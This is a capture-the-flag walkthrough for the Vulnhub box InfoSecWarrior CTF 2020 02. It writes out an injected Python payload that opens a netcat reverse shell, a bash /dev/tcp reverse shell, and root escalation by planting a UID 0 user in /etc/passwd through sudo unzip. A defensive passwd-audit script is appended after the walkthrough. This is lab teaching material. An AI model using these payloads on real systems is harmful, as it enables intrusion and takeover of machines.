Vulnhub – InfoSecWarrior CTF 2020 02 Walkthrough

Scanning the box with nmap -A -T4 -p- -vv:

Connecting to port 56563 with telnet:

There is a trick to it: instead of a number we can supply a Python expression, which the service evaluates:

__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444>/tmp/f')

And on our listening port we get a shell:

We upgrade the shell to a proper tty with python3 -c 'import pty;pty.spawn("/bin/bash")' and then view the file bla2-note:

The password czNjcjN0 is base64, which decodes to s3cr3t. Now let's look at the /etc/group file:

The password didn't work for bla or ck04. There is still the SSH service, so let's take a look at it:

The password didn't work there either, but something else might: cat /etc/*-release gives us:

CODENAME=bionic fits the banner's hint "Enumerate Hostname and Distro's codename of this box And try to get Secure Shell", so we try bionic as the password:

Strange: we get the user flag, but the session is closed immediately. Let's try again, this time running bash -p:

That worked, but we are stuck because no command shows any output, so we spawn another reverse shell using bash -i >& /dev/tcp/ 0>&1

User ck04 has sudo privileges:

And user bla has sudo privileges as well:

Now we add a new user with root privileges to /etc/passwd:

We copy /etc/passwd to bla's home directory, edit it and add the new entry:


Now we use the unzip command that sudo -l allowed us: first we zip the edited file, then we unzip it via sudo:

Now we su to hacker with the password 123456.
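As an added example (not part of the original walkthrough), here is a small Python audit a defender could run over /etc/passwd to catch the two things the final step relies on: a second account with UID 0, and a password hash written directly into /etc/passwd instead of the shadow placeholder. The file content below is constructed for the demonstration and the hash is a placeholder, not a real credential.

```python
"""Audit /etc/passwd-style content for the kind of tampering used in the
walkthrough: an extra UID 0 account and a hash stored in the passwd file.
Added example; SAMPLE_PASSWD is constructed, PLACEHOLDERHASH is not a hash.
"""

from typing import Dict, List

# Constructed sample: a normal file plus one injected entry.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bla:x:1000:1000:bla:/home/bla:/bin/bash
ck04:x:1001:1001::/home/ck04:/bin/bash
hacker:$1$PLACEHOLDERHASH:0:0::/root:/bin/bash
"""

# Values that legitimately appear in the password field of /etc/passwd:
# "x" means "look in /etc/shadow", the others mark a locked account.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!", "!*"}


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd content into one dict per entry, keeping the line number."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": str(lineno), "raw": line, "malformed": "1"})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({
            "line": str(lineno), "name": name, "pw": pw, "uid": uid,
            "gid": gid, "gecos": gecos, "home": home, "shell": shell,
        })
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    seen_names = set()
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(f"line {e['line']}: malformed entry {e['raw']!r}")
            continue
        name = e["name"]
        if name in seen_names:
            findings.append(f"line {e['line']}: duplicate account name {name!r}")
        seen_names.add(name)

        if not e["uid"].isdigit():
            findings.append(f"line {e['line']}: non-numeric UID for {name!r}")
        elif e["uid"] == "0" and name != "root":
            findings.append(f"line {e['line']}: non-root account {name!r} has UID 0")

        if e["pw"] == "":
            findings.append(f"line {e['line']}: account {name!r} has an empty password field")
        elif e["pw"] not in SHADOW_PLACEHOLDERS:
            findings.append(
                f"line {e['line']}: account {name!r} carries a password hash in "
                f"passwd instead of the shadow placeholder"
            )
    return findings


def audit_file(path: str = "/etc/passwd") -> List[str]:
    """Run the audit against a real file on the host."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) or ["no findings"]:
        print(finding)
```

Running the block on the constructed sample reports the injected `hacker` entry twice (UID 0 and an inline hash); `audit_file()` applies the same checks to the host's real /etc/passwd, which is the form you would schedule or hook into file-integrity monitoring.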
